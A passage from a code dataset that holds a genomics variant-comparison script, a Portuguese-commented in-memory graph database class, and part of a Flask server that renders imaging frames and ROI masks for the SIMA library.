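# whether any rows survive. A toy version on a synthetic table; requires a local
# Hail/Spark installation and assumes nothing about the real MT schema:
import hail as hl

hl.init(quiet=True)
mt = hl.utils.range_matrix_table(n_rows=10, n_cols=2)
mt = mt.annotate_rows(clinvar_stars=mt.row_idx % 3)

passes = mt.filter_rows(mt.clinvar_stars > 0).count_rows() > 0
print(passes)  # True: at least one row survived, so the condition is met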
matrix.info.clinvar_sig.lower().contains(PATHOGENIC)\n ).count_rows()\n == 0\n ):\n reasons.append('C3: No ClinVar Pathogenic')\n\n csq_filtered = filter_csq_to_set(matrix=matrix)\n # if there are no high consequences, no more rows to test; continue\n if not csq_filtered.count_rows():\n reasons.append('C3: No HIGH CSQs')\n return reasons\n\n # further filter to rows which aren't ruled out by LOFTEE\n if (\n csq_filtered.filter_rows(\n csq_filtered.vep.transcript_consequences.any(\n lambda x: (x.lof == LOFTEE_HC) | (hl.is_missing(x.lof))\n )\n ).count_rows()\n == 0\n ):\n reasons.append('C3: No LOFTEE High Confidence')\n\n return reasons\n\n\ndef check_cat_support(matrix: hl.MatrixTable) -> list[str]:\n \"\"\"\n test against all conditions of support category\n :param matrix:\n :return:\n \"\"\"\n reasons: list[str] = []\n\n if check_cadd_revel(matrix) == 0:\n reasons.append('Support: CADD & REVEL not significant')\n if (\n matrix.filter_rows(\n matrix.vep.transcript_consequences.any(\n lambda x: x.sift_score <= get_config()['filter']['in_silico']['sift']\n )\n ).count_rows()\n == 0\n ):\n reasons.append('Support: SIFT not significant')\n\n if (\n matrix.filter_rows(\n matrix.vep.transcript_consequences.any(\n lambda x: x.polyphen_score\n >= get_config()['filter']['in_silico']['polyphen']\n )\n ).count_rows()\n == 0\n ):\n reasons.append('Support: PolyPhen not significant')\n if (\n matrix.filter_rows(\n (matrix.info.mutationtaster.contains('D'))\n | (matrix.info.mutationtaster == 'missing')\n ).count_rows()\n == 0\n ):\n reasons.append('Support: No significant MutationTaster')\n\n return reasons\n\n\ndef prepare_mt(matrix: hl.MatrixTable) -> hl.MatrixTable:\n \"\"\"\n prepare the MT (splitting by gene, moving attributes, etc.)\n replicates split_rows_by_gene_and_filter_to_green\n :param matrix:\n :return:\n \"\"\"\n\n # split out the different gene annotations onto separate rows\n # but don't remove non-green genes yet\n matrix = matrix.explode_rows(matrix.geneIds)\n\n # csq filter to single gene per row\n matrix = matrix.annotate_rows(\n vep=matrix.vep.annotate(\n transcript_consequences=matrix.vep.transcript_consequences.filter(\n lambda x: (matrix.geneIds == x.gene_id)\n & ((x.biotype == 'protein_coding') | (x.mane_select.contains('NM')))\n )\n )\n )\n\n # move annotations, use original method\n return extract_annotations(matrix)\n\n\ndef check_mt(\n matrix: hl.MatrixTable,\n variants: CommonDict,\n green_genes: hl.SetExpression,\n new_genes: hl.SetExpression,\n) -> tuple[CommonDict, ReasonDict]:\n \"\"\"\n for all variants provided, check which are present in the matrix table\n export two lists; not in the MT, and in the MT\n\n There's currently a fair bit of repetition here, simplify\n\n :param matrix:\n :param variants:\n :param green_genes:\n :param new_genes:\n :return:\n \"\"\"\n\n not_in_mt: CommonDict = defaultdict(list)\n untiered: ReasonDict = defaultdict(list)\n\n for sample, variant in [\n (sam, var) for (sam, var_list) in variants.items() for var in var_list\n ]:\n logging.info(f'running check for {sample}, variant {variant}')\n\n # filter the MT to the required locus\n var_mt = find_variant_in_mt(matrix=matrix, var=variant)\n\n # check if there are remaining variant rows\n if not var_mt.count_rows():\n not_in_mt[sample].append(variant)\n continue\n\n # shift attributes in the MT, and explode on gene ID\n var_mt = prepare_mt(var_mt)\n\n # check for any failure reasons in the QC tests\n reasons: list[str] = []\n\n # run all methods relating to the quality of the variant 
call\n reasons.extend(run_ac_check(var_mt))\n reasons.extend(run_quality_flag_check(var_mt))\n reasons.extend(check_variant_was_normalised(var_mt))\n # # not actually a reason for failing\n # reasons.extend(filter_sample_by_ab(var_mt, sample))\n var_mt = check_gene_is_green(matrix=var_mt, green_genes=green_genes)\n if not var_mt.count_rows():\n reasons.append('Gene is not GREEN in PanelApp')\n\n # break early if we find a QC/Green Gene failure\n if reasons:\n untiered[sample].append((variant, reasons))\n continue\n\n # remove common variants\n var_mt, af_reason = check_population_rare(var_mt)\n\n # break early if we find a CSQ failure?\n if af_reason:\n reasons.extend(af_reason)\n untiered[sample].append((variant, reasons))\n continue\n\n # pass through the classification methods\n reasons.extend(check_cat_1(matrix=var_mt))\n reasons.extend(check_cat_2(matrix=var_mt, new_genes=new_genes))\n reasons.extend(check_cat_3(matrix=var_mt))\n reasons.extend(check_cat_support(matrix=var_mt))\n\n # log all reasons, even if the list is empty\n untiered[sample].append((variant, reasons))\n\n if not reasons:\n logging.error(f'No Fail reasons for Sample {sample}, ' f'Variant {variant}')\n\n return not_in_mt, untiered\n\n\ndef main(results_folder: str, pedigree: str, seqr: str, vcf: str, mt: str, output: str):\n \"\"\"\n runs a full match-seeking analysis of this AIP run against the\n expected variants (based on seqr training flags)\n\n :param results_folder:\n :param pedigree:\n :param seqr:\n :param vcf:\n :param mt:\n :param output:\n :return:\n \"\"\"\n\n # normalise data formats from AIP result file\n aip_results = common_format_aip(\n results_dict=read_json_from_path(\n os.path.join(results_folder, 'summary_results.json')\n )\n )\n\n # Search for all affected sample IDs in the Peddy Pedigree\n affected = find_affected_samples(Ped(pedigree))\n\n # parse the Seqr results table, specifically targeting variants in probands\n seqr_results = common_format_seqr(seqr=seqr, affected=affected)\n\n # strict comparison\n flag_summary = find_seqr_flags(aip_results=aip_results, seqr_results=seqr_results)\n with AnyPath(f'{output}_match_summary.json').open('w') as handle:\n json.dump(flag_summary, handle, default=str, indent=4)\n\n # compare the results of the two datasets\n discrepancies = find_missing(seqr_results=seqr_results, aip_results=aip_results)\n if not discrepancies:\n logging.info('All variants resolved!')\n sys.exit(0)\n\n # load and digest panel data\n panel_dict = read_json_from_path(os.path.join(results_folder, 'panelapp_data.json'))\n green_genes, new_genes = green_and_new_from_panelapp(panel_dict)\n\n # if we had discrepancies, bin into classified and misc.\n in_vcf, not_in_vcf = check_in_vcf(vcf_path=vcf, variants=discrepancies)\n\n # some logging content here\n for sample in not_in_vcf:\n logging.info(f'Sample: {sample}')\n for variant in not_in_vcf[sample]:\n logging.info(f'\\tVariant {variant} missing from VCF')\n\n # some logging content here\n for sample in in_vcf:\n logging.info(f'Sample: {sample}')\n for variant in in_vcf[sample]:\n logging.info(f'\\tVariant {variant} requires MOI checking')\n\n # if there were any variants missing from the VCF, attempt to find them in the MT\n if len(not_in_vcf) == 0:\n sys.exit(0)\n\n # if we need to check the MT, start Hail Query\n init_batch(driver_cores=8, driver_memory='highmem')\n\n # read in the MT\n matrix = hl.read_matrix_table(mt)\n\n not_present, untiered = check_mt(\n matrix=matrix,\n variants=not_in_vcf,\n green_genes=green_genes,\n 
new_genes=new_genes,\n )\n if untiered:\n with AnyPath(f'{output}_untiered.json').open('w') as handle:\n json.dump(untiered, handle, default=str, indent=4)\n\n if not_present:\n with AnyPath(f'{output}_missing.json').open('w') as handle:\n json.dump(not_present, handle, default=str, indent=4)\n\n\nif __name__ == '__main__':\n logging.basicConfig(\n level=logging.INFO,\n format='%(asctime)s %(levelname)s %(module)s:%(lineno)d - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n stream=sys.stderr,\n )\n parser = ArgumentParser()\n parser.add_argument('--results_folder')\n parser.add_argument('--pedigree')\n parser.add_argument('--seqr')\n parser.add_argument('--vcf')\n parser.add_argument('--mt')\n parser.add_argument('--output')\n args = parser.parse_args()\n main(\n results_folder=args.results_folder,\n pedigree=args.pedigree,\n seqr=args.seqr,\n vcf=args.vcf,\n mt=args.mt,\n output=args.output,\n )\n","repo_name":"populationgenomics/automated-interpretation-pipeline","sub_path":"comparison/comparison.py","file_name":"comparison.py","file_ext":"py","file_size_in_byte":26169,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"25488027794","text":"#coding: utf-8\r\n\r\nfrom bd_documento import BancoDocumentos\r\n\r\n\r\nclass BancoGrafo(BancoDocumentos):\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.arestas = {}\r\n self.contador_arestas = 0\r\n\r\n def criar_aresta(self, colecao_origem, indice_origem, colecao_destino, indice_destino, tipo, valor=None):\r\n # raises KeyError for nonexistent indices and ValueError for nonexistent collections\r\n if self.recuperar(colecao_origem, indice_origem) and self.recuperar(colecao_destino, indice_destino):\r\n aresta_existente = [a[1] for a in self.arestas.items() if\r\n a[1]['colecao_origem'] == colecao_origem and a[1]['indice_origem'] == indice_origem and\r\n a[1]['colecao_destino'] == colecao_destino and a[1]['indice_destino'] == indice_destino and\r\n a[1]['tipo'] == tipo]\r\n if not aresta_existente:\r\n self.contador_arestas += 1\r\n novo_indice = self.contador_arestas\r\n self.arestas[novo_indice] = {\r\n 'colecao_origem':colecao_origem, 'indice_origem':indice_origem,\r\n 'colecao_destino':colecao_destino, 'indice_destino':indice_destino,\r\n 'tipo':tipo, 'valor':valor}\r\n return novo_indice\r\n else:\r\n raise ValueError('Edge already exists.')\r\n\r\n def recuperar_aresta(self, indice):\r\n return self.arestas[indice] # lets KeyError propagate for a nonexistent index\r\n\r\n def buscar_aresta(self, colecao_origem, indice_origem, colecao_destino, indice_destino, tipo):\r\n indice = None\r\n indices = [a[0] for a in self.arestas.items() if\r\n a[1]['colecao_origem'] == colecao_origem and a[1]['indice_origem'] == indice_origem and\r\n a[1]['colecao_destino'] == colecao_destino and a[1]['indice_destino'] == indice_destino and\r\n a[1]['tipo'] == tipo]\r\n if indices:\r\n indice = indices[0]\r\n return indice\r\n\r\n def alterar_aresta(self, indice, novo_valor):\r\n self.arestas[indice]['valor'] = novo_valor\r\n\r\n def excluir_aresta(self, indice):\r\n del self.arestas[indice]\r\n\r\n def buscar_vertices_destino(self, colecao, indice, tipo):\r\n return [(a[1]['colecao_destino'], a[1]['indice_destino']) for a in self.arestas.items() if\r\n a[1]['colecao_origem'] == colecao and\r\n a[1]['indice_origem'] == indice and\r\n a[1]['tipo'] == tipo]\r\n\r\n def buscar_vertices_origem(self, colecao, indice, tipo):\r\n return [(a[1]['colecao_origem'], a[1]['indice_origem']) for a in self.arestas.items() if\r\n a[1]['colecao_destino'] == colecao and\r\n a[1]['indice_destino'] == indice and\r\n a[1]['tipo'] == 
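# A compact sketch of the edge-store idea above: every edge lives in one dict
# keyed by a counter, and every lookup is a linear scan over the values. Fine
# for small graphs; a real store would index by source and destination.
edges = {}
counter = 0

def create_edge(src, dst, kind, value=None):
    global counter
    counter += 1
    edges[counter] = {'src': src, 'dst': dst, 'kind': kind, 'value': value}
    return counter

def out_neighbours(src, kind):
    return [e['dst'] for e in edges.values()
            if e['src'] == src and e['kind'] == kind]

create_edge(('people', 1), ('people', 2), 'knows')
print(out_neighbours(('people', 1), 'knows'))  # [('people', 2)]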
tipo]","repo_name":"luizclaudio/nosqlba-2018","sub_path":"bds_exemplo_python/grafo/bd_grafo.py","file_name":"bd_grafo.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"21067744478","text":"from app import app\n\nimport numpy as np\n\nimport os.path\nimport glob\ntry:\n import cPickle as pickle\nexcept:\n import pickle\nimport base64\nimport matplotlib\nimport matplotlib.cm\nimport re\nimport time\nimport numpy.ma as ma\nimport json\nfrom shapely.geometry.point import Point\nimport urllib\nfrom skimage import img_as_ubyte\n\nfrom flask import render_template\nfrom flask import request\nfrom flask import jsonify\n\nfrom sima import ImagingDataset\nfrom sima import Sequence\nfrom sima.ROI import ROIList\nfrom sima.ROI import ROI\nfrom sima.segment import SmoothROIBoundaries\n\nfrom PIL import Image\ntry:\n import StringIO\nexcept:\n import io as StringIO\n\nimport lab.classes.sima_sequences as sima_sequences\n\nimport app.frame_loader as frame_loader\n\ndef convertToBin(arr):\n min_val = np.min(arr)\n arr += min_val\n dat = arr.reshape((1, arr.shape[0]))\n\n img = Image.fromarray(dat.astype('uint8'), 'L')\n strBuffer = StringIO.StringIO()\n img.save(strBuffer, 'png')\n strBuffer.seek(0)\n\n imageString = \"data:image/png;base64,\"+base64.b64encode(strBuffer.read())\n\n return (imageString, min_val)\n\n\ndef convertToB64Jpeg(arr, quality=100):\n img = Image.fromarray(arr, 'L')\n img_io = StringIO.StringIO()\n img.save(img_io, 'jpeg', quality=quality)\n img_io.seek(0)\n\n return 'data:image/jpeg;base64,'+base64.b64encode(img_io.read())\n\n\ndef convertToColorB64Jpeg(arr, quality=100):\n img = Image.fromarray(arr, 'RGB')\n img.save('/home/jack/tmp/'+str(time.time())+'.png')\n img_io = StringIO.StringIO()\n img.save(img_io, 'jpeg', quality=quality)\n img_io.seek(0)\n\n return 'data:image/jpeg;base64,'+base64.b64encode(img_io.read())\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n ds = request.args.get('dataset')\n channel = request.args.get('channel')\n cycle = request.args.get('cycle')\n cutoff1 = request.args.get('cutoff1')\n cutoff2 = request.args.get('cutoff2')\n\n return render_template('index.html', dataset=ds, channel=channel,\n cycle=cycle, cutoff1=cutoff1, cutoff2=cutoff2)\n\n\n@app.route('/getInfo', methods=['GET', 'POST'])\ndef getInfo():\n ds_path = request.form.get('path')\n\n if (os.path.splitext(ds_path)[-1] == '.sima'):\n try:\n ds = ImagingDataset.load(ds_path)\n except IOError:\n return jsonify(error='dataset not found')\n\n seq = ds.sequences[0]\n else:\n try:\n seq = Sequence.create('HDF5', ds_path, 'tzyxc', key='imaging')\n except IOError:\n return jsonify(error='dataset not found')\n\n length = seq.shape[0]\n\n norming_vals = []\n for c in range(seq.shape[4]):\n norming_vals.append(np.array(\n list(map(lambda f: (np.nanpercentile(seq._get_frame(f)[..., c], 2),\n np.nanpercentile(seq._get_frame(f)[..., c], 98)),\n [0, length//2, -1]))))\n norming_vals = np.nanmean(norming_vals, axis=1).astype(int)\n\n _json = {\n 'planes': list(range(int(seq.shape[1]+1))),\n 'height': int(seq.shape[2]),\n 'width': int(seq.shape[3]),\n 'length': length\n }\n for channel in range(seq.shape[4]):\n _json['channel_%s' % str(channel)] = \\\n list(norming_vals[channel].astype(float))\n\n return jsonify(**_json)\n\n\n@app.route('/getChannels', methods=['GET', 'POST'])\ndef getChannels():\n ds_path = request.args.get('directory')\n if (os.path.splitext(ds_path)[-1] == '.sima'):\n try:\n 
ds = ImagingDataset.load(ds_path)\n except IOError:\n return ''\n channels = ds.channel_names\n else:\n try:\n seq = Sequence.create('HDF5', ds_path, 'tzyxc', key='imaging')\n except IOError:\n return ''\n channels = ['channel_' + str(idx) for idx in range(seq.shape[4])]\n\n if (len(channels) > 1):\n channels += ['overlay']\n return render_template('select_list.html', options=channels)\n\n\n@app.route('/getCycles', methods=['GET', 'POST'])\ndef getCycles():\n ds_path = request.args.get('directory')\n\n if (os.path.splitext(ds_path)[-1] == '.sima'):\n try:\n ds = ImagingDataset.load(ds_path)\n except IOError:\n return ''\n return render_template(\n 'select_list.html', options=range(ds.num_sequences))\n\n return ''\n\n\n@app.route('/getLabels', methods=['GET', 'POST'])\ndef getLabels():\n ds_path = request.form.get('path')\n try:\n dataset = ImagingDataset.load(ds_path)\n except:\n return jsonify({ 'labels': [] })\n\n try:\n with open(os.path.join(dataset.savedir, 'rois.pkl'), 'rb') as f:\n labels = pickle.load(f).keys()\n except:\n return jsonify({ 'labels': [] })\n\n labels.extend(\n map(os.path.basename, glob.glob(os.path.join(ds_path, 'opca*.npz'))))\n\n labels = filter(lambda x: len(x) > 0, labels)\n #return render_template('select_list.html',options=['']+labels)\n return jsonify({ 'labels': labels })\n\n\n@app.route('/getRoiList', methods=['GET','POST'])\ndef getRoiList():\n ds_path = request.form.get('path')\n label = request.form.get('label')\n\n return render_template('select_list.html', options=['']+labels)\n\n\n@app.route('/getComponenets', methods=['GET', 'POST'])\ndef getComponents():\n ds_path = request.form.get('path')\n label = request.form.get('label')\n quality = 100\n\n if re.match('^ica',label) is not None:\n components = np.load(os.path.join(ds_path,label))['st_components']\n else:\n components = np.load(os.path.join(ds_path, label))['oPCs']\n\n projectedRois = {}\n for i in range(components.shape[3]):\n vol = components[:, :, :, i]\n cutoff = np.percentile(vol[np.where(np.isfinite(vol))], 25)\n vol -= cutoff\n cutoff = np.percentile(vol[np.where(np.isfinite(vol))], 99)\n vol = vol*255/cutoff\n vol = np.clip(vol, 0, 255)\n\n zsurf = np.nanmean(vol, axis=0)\n ysurf = np.nanmean(vol, axis=1)\n xsurf = np.nanmean(vol, axis=2).T\n\n label = 'component_' + str(i)\n\n projectedRois[label] = {\n 'z': convertToB64Jpeg(zsurf.astype('uint8'), quality=quality),\n 'y': convertToB64Jpeg(ysurf.astype('uint8'), quality=quality),\n 'x': convertToB64Jpeg(xsurf.astype('uint8'), quality=quality)\n }\n\n return jsonify(**projectedRois)\n\n\n@app.route('/getRoiMasks', methods=['GET', 'POST'])\ndef getRoiMasks():\n ds_path = request.form.get('path')\n label = request.form.get('label')\n index = request.form.get('index', type=int)\n overlay = True\n quality = 100\n\n dataset = ImagingDataset.load(ds_path)\n rois = dataset.ROIs[label]\n num_rois = len(rois)\n if index is not None:\n indicies = [index]\n else:\n indicies = range(num_rois)\n projectedRois = {}\n\n if overlay is True:\n vol = np.zeros(list(dataset.frame_shape[:3])+[3])\n cmap = matplotlib.cm.jet\n norm = matplotlib.colors.Normalize(vmin=0, vmax=num_rois)\n m = matplotlib.cm.ScalarMappable(norm=norm, cmap=cmap)\n\n for index in indicies:\n color = np.array(m.to_rgba(index))[:-1]\n color /= np.sum(color)\n roiVol = np.array(\n [plane.todense().astype(float) for plane in rois[index].mask])\n mask2 = ma.masked_where(\n np.logical_and(\n np.sum(vol, axis=-1) > 0, roiVol > 0), roiVol).mask\n mask1 = ma.masked_where(\n 
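# getRoiMasks colours each ROI by pushing its index through a matplotlib
# colormap; the ScalarMappable pattern on its own:
import matplotlib.cm
import matplotlib.colors

norm = matplotlib.colors.Normalize(vmin=0, vmax=9)
mapper = matplotlib.cm.ScalarMappable(norm=norm, cmap=matplotlib.cm.jet)
print(mapper.to_rgba(3))  # RGBA tuple for ROI index 3 of 10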
np.logical_and(np.logical_not(mask2), roiVol > 0), roiVol).mask\n\n if np.any(mask1):\n vol[mask1] = color\n\n if np.any(mask2):\n vol[mask2] = vol[mask2]/2+color/2\n\n cutoff = np.percentile(vol[np.where(np.isfinite(vol))], 25)\n vol -= cutoff\n cutoff = np.percentile(vol[np.where(np.isfinite(vol))], 99)\n vol = vol*255/cutoff\n vol = np.clip(vol, 0, 255)\n\n zsurf = np.nanmean(vol, axis=0)\n ysurf = np.nanmean(vol, axis=1)\n xsurf = np.swapaxes(np.nanmean(vol, axis=2), 0, 1)\n\n projectedRois['rois'] = {\n 'z': convertToColorB64Jpeg(zsurf.astype('uint8'), quality=quality),\n 'y': convertToColorB64Jpeg(ysurf.astype('uint8'), quality=quality),\n 'x': convertToColorB64Jpeg(xsurf.astype('uint8'), quality=quality)\n }\n return jsonify(num_rois=num_rois,**projectedRois)\n\n for i,roi in enumerate(rois):\n mask = roi.mask\n vol = np.array([plane.todense().astype(float) for plane in mask])\n cutoff = np.percentile(vol[np.where(np.isfinite(vol))], 25)\n vol -= cutoff\n cutoff = np.percentile(vol[np.where(np.isfinite(vol))], 99)\n vol = vol*255/cutoff\n vol = np.clip(vol, 0, 255)\n\n zsurf = np.nanmean(vol, axis=0)\n ysurf = np.nanmean(vol, axis=1)\n xsurf = np.nanmean(vol, axis=2).T\n\n if roi.label is None:\n roi.label = 'roi_' + str(i)\n\n projectedRois[roi.label] = {\n 'z': convertToB64Jpeg(zsurf.astype('uint8'), quality=quality),\n 'y': convertToB64Jpeg(ysurf.astype('uint8'), quality=quality),\n 'x': convertToB64Jpeg(xsurf.astype('uint8'), quality=quality)\n }\n\n return jsonify(**projectedRois)\n\n\n@app.route('/getRois', methods=['GET', 'POST'])\ndef getRois():\n ds_path = request.form.get('path')\n label = request.form.get('label')\n\n dataset = ImagingDataset.load(ds_path)\n convertedRois = {}\n try:\n rois = ROIList.load(os.path.join(dataset.savedir,'rois.pkl'),label=label)\n except:\n return jsonify({})\n\n for i, roi in enumerate(rois):\n if roi.id is None:\n roi.id = i\n\n roi_points = []\n try:\n for i in range(dataset.frame_shape[0]):\n roi_points.append([])\n except:\n for i in range(np.max(np.array(roi.coords)[:, :, 2])):\n roi_points.append([])\n for poly in roi.polygons:\n coords = np.array(poly.exterior.coords)\n if np.all(coords[-1] == coords[0]):\n coords = coords[:-1]\n plane = int(coords[0,-1])\n coords = coords[:,:2].astype(int).tolist()\n roi_points[plane].append(coords)\n\n convertedRois[roi.id] = {\n 'label': roi.label,\n 'points': roi_points\n }\n\n return jsonify(**convertedRois)\n\n\n@app.route('/getRoi', methods=['GET','POST'])\ndef getRoi():\n ds_path = request.form.get('path')\n label = request.form.get('label')\n roi_id = request.form.get('id')\n\n dataset = ImagingDataset.load(ds_path)\n convertedRois = {}\n try:\n rois = ROIList.load(os.path.join(dataset.savedir,'rois.pkl'),label=label)\n except:\n return jsonify({})\n\n for i,roi in enumerate(rois):\n if roi.id == roi_id:\n break\n\n roi_points = []\n try:\n for i in range(roi.im_shape[0]):\n roi_points.append([])\n except:\n for i in range(np.max(np.array(roi.coords)[:,:,2])):\n roi_points.append([])\n for poly in roi.polygons:\n coords = np.array(poly.exterior.coords)\n if np.all(coords[-1] == coords[0]):\n coords = coords[:-1]\n plane = int(coords[0,-1])\n coords = coords[:,:2].astype(int).tolist()\n roi_points[plane].append(coords)\n\n return jsonify({\n roi.id : {\n 'label': roi.label,\n 'points': roi_points\n }\n })\n\n\n@app.route('/getFrames', methods=['GET','POST'])\ndef getFrames():\n ds_path = request.form.get('path')\n request_frames = request.form.getlist('frames[]', type=int)\n normingVal = 
json.loads(request.form.get('normingVal'))\n sequenceId = request.form.get('sequenceId')\n channel = request.form.get('channel')\n planes = request.form.getlist('planes[]', type=int)\n cycle = request.form.get('cycle', type=int)\n\n if planes is None:\n planes = [0]\n\n quality = 40\n if channel == 'overlay':\n channel = None\n\n ds = None\n if (os.path.splitext(ds_path)[-1] == '.sima'):\n ds = ImagingDataset.load(ds_path)\n seq = ds.sequences[cycle]\n channel = ds._resolve_channel(channel)\n else:\n seq = Sequence.create('HDF5', ds_path, 'tzyxc', key='imaging')\n if channel:\n channel = int(channel.split('_')[-1])\n\n if channel is not None:\n if len(planes) > 1:\n load_frames = frame_loader.load_frames_multiplane\n else:\n load_frames = frame_loader.load_frames\n planes = planes[0]\n\n else:\n if len(planes) > 1:\n load_frames = frame_loader.load_frames_multiplane_2chan\n else:\n load_frames = frame_loader.load_frames_2chan\n planes = planes[0]\n\n end = False\n frames = {}\n lut_cutoffs = np.array(normingVal[:])[channel].astype(float)\n frames = {'frame_%s' % idx: {} for idx in request_frames}\n if -1 in request_frames and ds is not None:\n request_frames.remove(-1)\n try:\n with open(os.path.join(ds.savedir, 'time_averages.pkl')) as f:\n time_averages = pickle.load(f)\n if not isinstance(time_averages, np.ndarray):\n raise Exception('no time average')\n except:\n time_averages = seq._get_frame(0)\n ta_luts = lut_cutoffs\n else:\n ta_luts = np.vstack((\n [np.nanpercentile(f, 2) for f in\n np.rollaxis(ds.time_averages, -1, 0)],\n [np.nanpercentile(f, 99) for f in\n np.rollaxis(ds.time_averages, -1, 0)])).T\n ta_luts = ta_luts[channel]\n\n load_frames(np.expand_dims(time_averages, 0), [-1], ta_luts,\n planes, channel, quality, frames)\n\n request_frames = list(filter(lambda i: 0 <= i <= seq.shape[0], request_frames))\n if not len(request_frames):\n return jsonify(end=end, sequenceId=sequenceId, **frames)\n\n seq = sima_sequences._SplicedSequence(seq, request_frames)\n\n load_frames(seq, request_frames, lut_cutoffs, planes, channel, quality,\n frames)\n return jsonify(end=end, sequenceId=sequenceId, **frames)\n\n\ndef deleteme():\n for frame_number in request_frames:\n if frame_number > len(seq)-1 or frame_number < -1:\n end = True\n continue\n\n elif frame_number == -1 and ds is not None:\n try:\n time_averages = pickle.load(\n open(os.path.join(ds.savedir, 'time_averages.pkl')))\n if not isinstance(time_averages, np.ndarray):\n raise Exception('no time average')\n except:\n vol = seq._get_frame(0)\n else:\n vol = ds.time_averages\n norming_val = np.vstack((\n [np.nanpercentile(f, 2) for f in\n np.rollaxis(ds.time_averages, -1, 0)],\n [np.nanpercentile(f, 99) for f in\n np.rollaxis(ds.time_averages, -1, 0)])).T\n else:\n vol = seq._get_frame(frame_number)\n\n if channel is not None:\n norming_val = norming_val[channel]\n vol = vol[:, :, :, channel]-norming_val[0]\n vol = vol/((norming_val[1]-norming_val[0])/255.0)\n vol = np.clip(vol, 0, 255)\n else:\n vol = np.hstack(((vol[:,:,:,0]-norming_val[0][0])/(norming_val[0][1]-norming_val[0][0]),\n (vol[:,:,:,1]-norming_val[1][0])/(norming_val[1][1]-norming_val[1][0])))\n vol*=255\n frames['frame_'+str(frame_number)] = {};\n\n for plane in planes:\n if plane == 0:\n zsurf = np.nanmean(vol, axis=0)\n else:\n zsurf = vol[plane-1, :, :]\n\n if plane == 0:\n ysurf = np.nanmean(vol, axis=1)\n else:\n ysurf = np.zeros((vol.shape[0], vol.shape[2]))\n ysurf[plane-1, :] = np.nanmean(zsurf, axis=0)\n\n if plane == 0:\n xsurf = np.nanmean(vol, axis=2).T\n 
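# The frame endpoints normalise raw intensities with percentile cutoffs before
# JPEG encoding, mirroring the arithmetic in getFrames; standalone:
import numpy as np

frame = np.random.rand(64, 64) * 4096          # stand-in for one imaging frame
lo, hi = np.nanpercentile(frame, 2), np.nanpercentile(frame, 98)
scaled = np.clip((frame - lo) / ((hi - lo) / 255.0), 0, 255).astype('uint8')
print(scaled.min(), scaled.max())              # 0 255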
else:\n xsurf = np.zeros((vol.shape[1],vol.shape[0]))\n xsurf[:,plane-1]=np.nanmean(zsurf,axis=1).T\n\n frames['frame_'+str(frame_number)][plane] = {\n 'z': convertToB64Jpeg(zsurf.astype('uint8'), quality=quality),\n 'y': convertToB64Jpeg(ysurf.astype('uint8'), quality=quality),\n 'x': convertToB64Jpeg(xsurf.astype('uint8'), quality=quality)\n }\n\n return jsonify(end=end, sequenceId=sequenceId, **frames)\n\n\n@app.route('/setRoiLabel', methods=['GET', 'POST'])\ndef setRoiLabel():\n ds_path = request.form.get('path')\n #old_label = request.form.get('oldLabel')\n old_label = ''\n new_label = request.form.get('newLabel')\n\n if new_label == '' or len(new_label) == 0:\n new_label = 'rois'\n\n dataset = ImagingDataset.load(ds_path)\n if (old_label != ''):\n rois = dataset.ROIs[old_label]\n else:\n rois = ROIList([])\n dataset.add_ROIs(rois, label=new_label)\n\n labels = dataset.ROIs.keys()\n\n labels.extend(\n map(os.path.basename, glob.glob(os.path.join(ds_path, 'ica*.npz'))))\n labels.extend(\n map(os.path.basename, glob.glob(os.path.join(ds_path, 'opca*.npz'))))\n\n labels = filter(lambda x: len(x) > 0, labels)\n\n return jsonify({ 'labels': labels })\n\n\n@app.route('/deleteRoiSet', methods=['GET', 'POST'])\ndef deleteRoiSet():\n ds_path = request.form.get('path')\n dataset = ImagingDataset.load(ds_path)\n label = request.form.get('label')\n\n dataset = ImagingDataset.load(ds_path)\n dataset.delete_ROIs(label)\n\n return jsonify(result='success')\n\n\n@app.route('/selectRoi', methods=['GET', 'POST'])\ndef selectRoi():\n ds_path = request.form.get('path')\n label = request.form.get('label')\n plane = float(request.form.get('z'))\n\n point = Point(float(request.form.get('x')), float(request.form.get('y')))\n\n dataset = ImagingDataset.load(ds_path)\n rois = ROIList.load(os.path.join(dataset.savedir, 'rois.pkl'), label=label)\n\n for roi in rois:\n for poly in roi.polygons:\n z_coord = np.array(poly.exterior.coords)[0, 2]\n if z_coord == plane or plane == -1:\n if poly.contains(point):\n return jsonify(label=roi.label, id=roi.id)\n\n return jsonify({'error': 'roi not found'})\n\n\n@app.route('/updateRoi', methods=['GET', 'POST'])\ndef updateRoi():\n ds_path = request.form.get('path')\n label = request.form.get('label')\n points = json.loads(request.form.get('points'))\n roi_label = request.form.get('roiLabel')\n roi_id = request.form.get('roiId')\n\n if label == '' or len(label) == 0:\n raise Exception('ROIList not found')\n\n dataset = ImagingDataset.load(ds_path)\n roi_data = []\n for i, plane in enumerate(points):\n if plane is None or not len(plane):\n continue\n array_dat = np.array(plane)\n z_dims = i*np.ones((array_dat.shape[:2]+(1,)))\n plane_data = np.concatenate((array_dat, z_dims), axis=2)\n roi_data.extend(list(plane_data))\n\n if len(roi_data) == 0:\n return jsonify(result=\"no polygons to save\")\n\n for poly in roi_data:\n if poly.shape[0] < 3:\n raise Exception(\"unable to store polygon with less then 3 points\")\n roi = ROI(polygons=roi_data,im_shape=dataset.frame_shape[:3])\n\n roi.label = roi_label\n roi.id = roi_id\n try:\n rois = dataset.ROIs[label]\n except KeyError:\n rois = []\n\n rois = filter(lambda r: r.id != roi_id, rois)\n rois.append(roi)\n dataset.add_ROIs(ROIList(rois), label=label)\n\n return jsonify(result='success')\n\n\n@app.route('/deleteRoi', methods=['GET', 'POST'])\ndef deleteRoi():\n ds_path = request.form.get('path')\n label = request.form.get('label')\n roi_id = request.form.get('roiId')\n\n dataset = ImagingDataset.load(ds_path)\n try:\n rois = 
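# selectRoi resolves a click to an ROI with shapely's point-in-polygon test;
# the same call in miniature:
from shapely.geometry import Point, Polygon

square = Polygon([(0, 0), (10, 0), (10, 10), (0, 10)])
print(square.contains(Point(5, 5)))   # True
print(square.contains(Point(15, 5)))  # False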
